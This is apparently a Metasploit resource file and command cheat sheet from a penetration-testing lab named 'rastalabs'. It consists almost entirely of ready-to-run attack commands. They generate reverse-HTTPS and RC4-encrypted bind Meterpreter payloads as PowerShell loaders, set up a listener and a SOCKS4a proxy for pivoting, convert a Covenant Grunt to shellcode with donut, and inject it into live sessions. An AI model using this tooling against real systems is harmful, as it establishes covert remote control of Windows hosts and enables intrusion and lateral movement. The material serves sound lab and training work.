#### START MSFCONSOLE ####
#msfconsole -r pivot.rc -q


#### SSL PEM ####
#openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout /tmp/rsaprivate.key -out /tmp/servercertificate.crt
#cat /tmp/rsaprivate.key /tmp/servercertificate.crt > /root/rastalabs/msf.pem


#### psh-net loader ####
#msfvenom --payload windows/x64/meterpreter/reverse_winhttps LHOST=tun0 LPORT=443 HandlerSSLCert=/root/rastalabs/msf.pem StagerVerifySSLCert=true -f psh-net -o 443.ps1


#### PIVOTING AND PASSING SOCKS ####
spool msf.log
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_winhttps
set HandlerSSLCert /root/rastalabs/msf.pem
set SessionCommunicationTimeout 600
set LHOST tun0
set LPORT 443
set EXITFUNC thread
set EXITONSESSION false
exploit -j
#### ENDING ####


#### SOCKS4a ####
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 1080
exploit -j
#### ENDING ####


#### RC4 ENC BIND####
#msfvenom --payload windows/x64/meterpreter/bind_tcp_rc4 RC4PASSWORD=ayylmao_41i3n5 LPORT=8080 -f psh-net -o 8080_bind.ps1
#use payload/windows/x64/meterpreter/bind_tcp_rc4
#set EXITFUNC thread
#set LPORT 8080
#set RHOST 10.10.16.34
#set RC4PASSWORD ayylmao_41i3n5
#### ENDING ####


#INJECT
#C:\payloads> C:\tools\donut\donut.exe HTTPGrunt.exe -e1 -a2 -b1 -f1 -x1 -o HTTPGrunt.bin
#use post/windows/manage/shellcode_inject
#sessions
#set SESSION 1
#set SHELLCODE /tmp/HTTPGrunt.bin
#run


#Generate an x64 bind TCP Meterpreter payload using msfconsole or msfvenom and output to .ps1 using the psh-net format type.
#prtfwd
#use exploit/multi/handler
#set payload windows/x64/meterpreter/bind_tcp
#set LPORT 4444
#set RHOST 10.10.120.20
#exploit -j
